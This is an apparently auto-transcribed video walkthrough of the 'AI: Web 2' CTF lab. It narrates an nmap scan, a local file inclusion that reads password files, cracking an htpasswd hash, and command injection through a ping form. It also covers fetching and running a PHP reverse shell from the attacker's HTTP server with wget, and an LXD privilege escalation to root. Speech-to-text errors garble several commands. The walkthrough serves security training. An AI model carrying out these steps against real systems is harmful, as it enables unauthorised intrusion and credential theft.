Hello guys, welcome back to a Pen Testers Club. Today we're going to solve another CTF challenge named called Artificial Intelligence of Website 2. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network scanning, enumeration, exploitation, privilege escalation, and capture the flag. So first open the terminal. So just type sudo su and enter the password. So just type net discount minus I is 0. So we find our hosting machine is here. So you just quit now. You just type nmap -34 minus a is an aggressive scan and enter your targeted IP address. Sorry. So enter your targeted IP address. So now let's wait for the nmap result. So we got it, the nmap result. One is available with SH, another one is available with 80. So now we would like to open the Firefox and we would like to enter to our targeted website. So here, so enter your targeted IP address 192.168.0.113. Let's enter. So it's like a file manager, like you can share a files from internet. Like if you want to share a files from your PC without sending through any type of targeted platforms like WhatsApp, Dropbox, or etc. box. So you can use like a Toffee share. So from your system, if there is connected to an internet, that will be shared very easily. So it's ask a username. So we would like to look first the page source. So page source is here, so there is nothing else. So first we would like to register. So enter a username. So enter any type of targeted username. So enter a username now. Just enter username, then click on OK. So we have done. Now we would like to log in again. So enter the same username, then click on login. So we have successfully logged in. So now we can see here. Excuse I prefer not to pronounce this Chinese language. Very hard to me. So we would like to look this. We would like to look in the exploit DB. So first we would like to look in the exploit DB. So here we got it, this one, file sharing. Directory traversal path. So now, so we would like to look, not this one. Then we need to get like a vulnerable test file sharing. So we would like to get it from here, viewing PHP and including etc and password. So just copy this one. It's like a local file inclusion. So we just come back here. So come back here. So before that we have that one. So before that we would like to do the directory busting. So you just type directory busting http 192.168.0.113. So we would like to get the directory busting here. So any useful information we can get it or not, we would like to look it from here. So this information is enough. So we would like to go further. So we have one is a web admin, another one is SRV. So first we would like to visit to the web admin in a new tab. So come back here, open new tab. So we would like to cross back here. You just type HTTP 192.168.0.113 and we just type web admin. So it's asking a username and password, but we don't know the username and password. So first we would like to enumerate with this local file inclusion and exploit. So first we would like to come back here. So we just copy this one. Now come back here. So in the we would like to delete all these things. So our directory is in here. So we would like to paste it. Viewing.php question mark file name and local file inclusion. That's it. So we got the username here. So username is like artificial intelligence website 2, otherwise not a root user. So we would like to consider these last two things. So you need to always consider when you get a response from the local file inclusion, you need to consider bin bash and this bin bash also. So now what we would like to look here, so we would like to consider uh, etc home or AI web 2. Otherwise we would like to look in a different way. We would like to look, so it also hosted like in catchy and something else nano home, but we not yet get. So we try with the Apache. So now come back here. So I would like to try with the Apache 2, Apache 2 forward slash ht password. So we got this one web admin. So we just entirely just copy this one, come back here, open a nano hash one, and we would like to paste it, Control O and Control X. So now we would like to type John word list equal to dictionary.txt and you just type hash one. So it will crack the password type list. So show job. So we got it, the password is C Ronaldo. So just copy this one. So we got it, the username is AI web admin 2 and C Ronaldo. So we just copy, come back here. So this one. So now we would like to again go for login. So paste the username, come back here. C Ronaldo. Just copy, come back here. So before only I just created the password list. So I just use that password list only. So now we have successfully got it. So he was written, I disallowed some contents in the robots.txt. So we would like to look the view page source. There is no any useful information from here. So we just come back here and this also you need to delete it. So there is no useful thing. Now come back here. So just type robots.txt. In the robots.txt, we have two files. So we would like to just copy this one, come back here. So enter your targeted IP address, including with the web admin, and paste this one. So ping a IP address. So we need to ping a IP address. So you just type 127.0.0.1. So you just type submit. So we got a response here. Now we would like to look another one. Come back here, web admin, come back. So we would like to look here some extras. So just copy, paste it. Find a juicy information of this directory. This directory means we cannot able to find this directory. We can find with the first link. So here is nothing else. So we would like to close this, come back, and we just type ID. So we are getting an ID. So now we would like to look uh, get here a pentest monkey of reverse shell. So we just type clear list. So I already have here reverseshell.php. So I just type mousepad rshell.php. So we would like to configure our targeted IP address. So file, new tab. You just type ifconfig. This our targeted IP address. Just copy. Uh, so we would like to look. We have successfully configured or not? Yes, we have successfully configured. So come back here. So now we would like to type here netcat minus lvnp 1234. So we would like to set up a listener, and we would like to type python minus m http dot server. Now we would like to look the same thing. So you just type wget http 192.168.0.11108 and 8000 and rshell.php. So we got a reverse shell and we just type submit. So this already taken, so it not get a response like you have saved the rshell.php, but we can see from here 200 is okay, we have successfully sent in the server. Now what we would like to look here, come back here, we would like to type rshell.php. So it's running. So we have successfully got the reverse shell in this tab. You can see here we have successfully got. You just type ID, who am I, you just type which Python, you got it. So you just type python minus c import pdy span bin bash. So we have successfully got it. So you just type pwd, we are in the right directory. So you just type cd home list minus al cd ai web 2 list minus al. There is nothing else useful information. Come back, cd. So we just copy this one, non-root user. List minus al. So here also nothing else. So you just type cd. So you just type cd where www.html. So there is nothing else. So only have one flag. So we are targeted in the first in the web admin. So we would like to go to a web admin list minus al. So we would like to read this HTTP access. So otherwise we would like to look host pin and some extras. So we are ping and get this reverse shell in some extras. So this is this one. So you just type cd some extras. list minus L. So here we got it as such credentials dot txt. So it's not allowing typing. So just type cat dot sh user cred 55512.txt. So we got it our sh credentials here. So we just copy this, just copy, come back here, the new tab, you just quit this, you just open a notepad, so now just paste it. So now we would like to log in as such. So the username is non-root user, just copy, come back and paste it, and enter your targeted IP address 0.113, and it's ask a permission, yes. So enter the password, this is the password, just copy, come back here, paste it. So we have successfully logged into the non-root user. So you just type list minus L. So we don't have anything else to use or utilize from here. So you just type sudo minus L. It's asking a password, paste it. So it may not run. So you just type what you would like to type here. You just type ID. So it is in the LX tree. So from this no use. So come back here. So you just quit it. Now close this. So now we would like to type clear. So you just type subsploit and LXT. So we have here the subsploit LXT. So now we would like to type subsploit minus M 46978.sh, and you just type a cat 46978.sh. So we would like to type here. So first entirely we just copy this one. We just need to download and build the Alpine builder in attacker machine. So this is our attacker machine. So we have connected to the victim machine. Okay, so now we would like to type here, paste this. So we're gonna build this Alpine builder right now. So we have successfully built the Alpine builder from here. So now we would like to run this one, bash build Alpine as an in the root. So we would like to type sudo su and enter the password. So now we would like to paste this. So now it will create as an APK here. So it will take a little bit time for generating an API key. So it will not take less than half second. So it will take. So it was done now. So now here we have the LX3. So there is no useful information that we was discussed in the before. So now we just type cd a temp directory. Now what we would like to do here is, so let it build this one. So now we can see here our Alpine builder is here. So you just type exit. So you just type python minus m http.server. Before we have created in 8080 8000. So now you would like to type 80. So we would like to know your targeted IP address here. So you just type ifconfig. This is your targeted IP address. So now you just come back here wget http 192.168.0.108 and 80 and what the file you would like to get. So this is the file. So just copy, come back here, paste it. Okay, I have done a mistake here in the address of HTTP. So we have successfully got it here in the Alpine builder. So now what we would like to do here is, so now we have shared this one. So you just quit it, you just type clear. So you just type list get 46978.sh. So you just entirely just copy this one, just entirely just scroll down. So entirely just copy this one, come back here. So now we need to create type a nano exploit.sh. On just pasted this entirely code. So you just type Control O is for writing, Control X for quitting. So now we would like to give a permission chmod 777 exploit.sh. So we have successfully given the exploit. So now we just type list. So we have here our exploit.sh. So we just type run this exploit.sh with the file name of Alpine builder. So just copy and paste it. That's it. So now let's wait. It's creating and getting the root privilege access. So today date is June 5, 2024, 10:20 p.m. 10:02 p.m. So you just type ID. We are in the root directly. So now you just type cd root list minus -l. So if you want to go to a root, so you just type cd mount root, and again we need to type root. Then just type list minus -l. So here have flag.txt. So you just type cat flag.txt. So we have successfully got this lab completed. So you try it your own, guys. Thank you guys for watching. Keep smiling.